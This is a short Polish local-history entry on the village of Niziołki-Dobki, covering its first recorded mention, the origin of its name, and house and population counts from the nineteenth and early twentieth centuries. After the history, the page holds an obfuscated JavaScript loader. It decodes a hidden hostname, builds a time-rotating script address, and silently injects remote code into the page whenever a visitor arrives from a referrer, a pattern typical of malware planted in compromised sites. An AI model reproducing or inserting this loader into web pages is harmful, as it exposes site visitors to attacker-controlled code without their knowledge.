Niziołki- Dobki

Niziołki Dobki powstały później niż Niziołki Stare. Pierwsze pewne informacje o tej wsi pochodzą z 1795 roku z ówczesnej mapy województwa podlaskiego, zapisano tam nazwę jako Kulesze Niesiołki Dobki. Słowo Dobek było staropolskim imieniem i zapewne tak miał na imię pierwszy osadnik. Jednak w następnych latach nazwa brzmiała już tak, jak współcześnie. W 1827 roku notowano tutaj 10 domów i 62 mieszkańców. Słownik Geograficzny z 1888 roku zapisał: Niziołki Dobki i Niziołki Stare, wsie, powiat mazowiecki, gmina Chojany, parafia Kulesze. Mieszka tu drobna szlachta. W kilka lat później istniało tutaj 8 gospodarstw drobnej szlachty na 78 ha gruntów, średnie gospodarstwo miało obszar prawie 10 ha. W 1921 roku wioska należała do gminy Wysokie Mazowieckie, liczyła 14 domów i 80 mieszkańców.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);